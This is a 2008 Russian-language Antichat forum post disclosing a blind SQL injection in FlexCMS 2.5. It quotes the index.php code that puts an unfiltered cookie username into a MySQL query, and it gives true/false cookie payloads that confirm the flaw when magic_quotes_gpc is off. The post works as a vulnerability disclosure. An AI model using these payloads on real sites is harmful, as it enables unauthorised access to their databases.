Flex CMS 2.5 Blind SQL-Injection

FlexCMS 2.5 Blind SQL-Injection

16.12.2008, 02:53

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

С нами: 10309346

Репутация: 4303

FlexCMS 2.5 Blind SQL-Injection

Сайт: www.flexcms.com
Требования: magic_quotes_gpc = off
Тестилось на последней free версии, скаченной с офф сайта
Уязвимость в файле index.php

PHP код:


		
			
$CookieData = $HTTP_COOKIE_VARS[$CookieName];



$LoggedIn = 'n';

$UserLevel = 0;

 

if ($CookieData != '' && $CookieData != 'not_logged_in') {

    list ($CookieUsername, $CookiePassword) = split('==', $CookieData, 2);

    if ($CookieUsername != '' && $CookiePassword != '') {

        $query = "select RecordNumber,Level,Password,DisplayName,SessionLength from `".$Settings['DBPrefix']."core-Users` where Username='$CookieUsername' LIMIT 1";

        $result = mysql_query($query) or die (mysql_error());

В cookies передаются логин и пасс, в таком виде
логин==зашифрованый_пасс
Т.к переменная $CookieUsername никак не фильтруется и при наличии magic_quotes_gpc = off есть возможность провести инъекцию

Example:

Код:

True: FCLoginData12345=qwerty'+and+1=1/*%3D%3DqwDyM1dbqwDyM1db9iOPI
False: FCLoginData12345=qwerty'+and+1=2/*%3D%3DqwDyM1dbqwDyM1db9iOPI

Сразу скажу что не тестил в нете. Бага вроде тоже нигде не описана, если чё удалите(

𝕏 Twitter Reddit Telegram Копировать ссылку

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

Последний раз редактировалось Spyder; 16.12.2008 в 02:59..